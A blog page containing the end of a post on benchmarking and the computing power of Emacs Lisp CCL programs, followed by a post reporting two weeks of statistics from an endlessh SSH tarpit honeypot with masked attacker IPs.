;; => "Elapsed time: 0.365031s (0.071827s in 1 GCs)"
(benchmark 1000 '(sierpinski))
;; => "Elapsed time: 0.545512s (0.071829s in 1 GCs)"

If you want to see it in action, try evaluating (progn (princ (sierpinski)) nil) in M-x ielm.

Now for a big letdown, despite everything what I’ve demonstrated, this system is not turing-complete after all. While it’s capable of processing a single line of input, the proof of Rule 110 being turing-complete relies on feeding its output in as input over and over again, however that part has been done in Emacs Lisp as it’s impossible to do in CCL. I’m not 100% sure what CCL’s computing power is, Noam Postavsky suggested on #emacs that it’s most likely a finite-state transducer.

Final words

You may ask yourself now whether you should rewrite all of your slow code to CCL programs. I don’t believe that’s the way to go for a number of reasons:

  • Speedups vary wildly, somewhere between -40% to 450%. There’s no obvious way of predicting whether the optimization is worth it.
  • It’s hard to write an equivalent program or sometimes even impossible, especially if it requires you to use many variables or random access read/write operations.
  • It’s hard to debug a CCL program. While the compiler does a good job at catching syntax errors, runtime errors are far harder to figure out if you can only stare at the registers. Maybe a debugger could be built that uses the “continue” facility and instruction counter register…
  • It’s hard to maintain a CCL program. Not to mention, there’s hardly people who know how to write them. Most of the examples I’ve found online do text encoding/decoding. The only exception to this is pgg-parse-crc24-string which lives in a file marked as obsolete.
  • This leads me to my last point, CCL may be obsoleted as well. Granted, it will take time, but so far I haven’t seen people enthusiastic about it being a thing.

If you still believe that despite of this it’s worth giving CCL a try, please let me know, especially if you’re doing something non-standard with it, like advanced cryptography or number crunching. Likewise, if you’re not convinced that it’s turing-complete or that I could be doing some things far better than presented, send me a message.


Trapping Attackers Without Nyan Cat

19/05/2019

As of a little over two weeks ago I’ve stopped offering the service I’ve described in an earlier blog post. Someone™ managed maxing out my server’s resources by establishing as many connections as possible and keeping them open for hours. Eventually my hoster sent me an email about unusually high resource usage. After a reboot everything was back to normal, but I didn’t feel like allowing this to happen again, so I shopped for a more efficient SSH honeypot.

endlessh fits the bill. It does as little work as possible, yet wastes the unsuspecting attacker’s time in a rather sneaky way: By sending an infinite SSH banner. The downside is that you won’t ever find out what kind of software the attacker is using since it doesn’t proceed beyond that stage. I was curious how well it works in practice, so I collected logs for two weeks, wrote a bit less than 100 SLOC of Ruby to do basic statistics and plotted the overall distribution with gnuplot.


Hosts: 21286
Unique hosts: 1665
Total time wasted: 17 days, 2 hours, 51 minutes and 40 seconds
Max time wasted: 7 days, 9 hours, 19 minutes and 39 seconds
Average time wasted: 20 minutes and 38 seconds
Total bytes sent: 43.6M
Max bytes sent: 1.1M
Average bytes sent: 2.1K
Max connections established: 58
Greatest netsplit: 47

Top 10 hosts:
  112.***.***.***: 12160 connections
   58.***.***.***: 2427 connections
  218.***.***.***: 1792 connections
   58.***.***.***: 358 connections
  195.***.***.***: 174 connections
  185.***.***.***: 109 connections
  222.***.***.***: 65 connections
  223.***.***.***: 58 connections
  115.***.***.***: 52 connections
  180.***.***.***: 51 connections
/img/endlessh-thumb.png